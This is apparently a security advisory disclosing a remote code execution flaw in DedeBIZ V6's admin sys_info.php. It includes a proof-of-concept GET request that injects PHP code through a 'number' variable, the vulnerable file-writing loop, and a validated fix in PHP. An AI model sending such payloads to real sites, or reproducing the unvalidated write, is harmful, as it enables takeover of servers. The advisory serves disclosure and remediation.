DedeBIZ has a remote code execution vulnerability

  • Affected product: DedeBIZ V6
  • Attack type: Remote
  • Affected component: /admin/sys_info.php
  • Description: DedeBIZ v6.* was discovered to contain a remote code execution vulnerability in sys_info.php.
  • Vendor confirmed or acknowledged: Confirmed
  • Fix Information: Not available

POC

GET /admin/sys_info.php?dopost=add&nvarname=test&nvarvalue=phpinfo()&vartype=number HTTP/1.1
Host: www.dedebiz6.com
Cookie:  PHPSESSID=bs4vp003uqilf3pj1al024egs2; DedeUserID=1; DedeUserID__ckMd5=6d2e834b19e2030a; DedeLoginTime=1657701678; DedeLoginTime__ckMd5=34d8cf865664d363
Connection: close

Details

The DedeBIZ v6.* backend page admin/sys_info.php provides a function for adding variables, but the values of variables of type 'number' are not strictly filtered before they are written to the database and to PHP files, resulting in remote code execution.

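// Each stored variable is written as a line of a generated PHP file.
while ($row = $dsql->GetArray()) {
    if ($row['type'] == 'number') {
        if ($row['value'] == '') $row['value'] = 0;
        // Vulnerable: the stored value is concatenated unquoted and unvalidated,
        // so it is written into the file as PHP code rather than as data.
        fwrite($fp, "\${$row['varname']} = ".$row['value'].";\r\n");
    } else {
        ...
    }
}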

Suggestions for fixing

For variables whose vartype is 'number', check that the value is a number, or force it to be a number, before writing it to the database and PHP files.
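
One way to apply this suggestion, as an added example that is not DedeBIZ code: the value is validated, cast to a number, and the text written to the file is generated from that number instead of the submitted string. The function names and the sample rows are hypothetical, and the variable-name check is an extra precaution assumed here, not something the report describes.

```php
<?php
// Added illustration, not DedeBIZ source; function names are hypothetical.

/** Return a PHP numeric literal for a 'number' value, or null if it is not numeric. */
function number_literal(string $raw): ?string
{
    $raw = trim($raw);
    if ($raw === '') {
        return '0';                      // same default as the original loop
    }
    if (!is_numeric($raw)) {
        return null;                     // e.g. "phpinfo()" is rejected here
    }
    $num = $raw + 0;                     // int or float, never a string
    if (is_float($num) && !is_finite($num)) {
        return null;                     // overflowed to INF
    }
    // Emit text generated from the number, not the submitted string,
    // so "08" becomes 8 instead of an invalid octal literal.
    return var_export($num, true);
}

/** Assumption: the name becomes a PHP identifier in the file, so allow-list it. */
function is_safe_varname(string $name): bool
{
    return preg_match('/\A[A-Za-z_][A-Za-z0-9_]*\z/', $name) === 1;
}

/** Build one line of the generated file, or null to reject the row. */
function render_number_row(array $row): ?string
{
    $value = number_literal((string) $row['value']);
    if ($value === null || !is_safe_varname((string) $row['varname'])) {
        return null;
    }
    return '$' . $row['varname'] . ' = ' . $value . ";\r\n";
}

// Constructed sample rows; the second uses the value from the request above.
$rows = [
    ['varname' => 'cfg_limit', 'type' => 'number', 'value' => '08'],
    ['varname' => 'test',      'type' => 'number', 'value' => 'phpinfo()'],
];
foreach ($rows as $row) {
    $line = render_number_row($row);
    echo $line ?? "rejected: {$row['varname']}\r\n";
}
```

The same check belongs at the point where the value is accepted and stored, so that a non-numeric value never reaches the database.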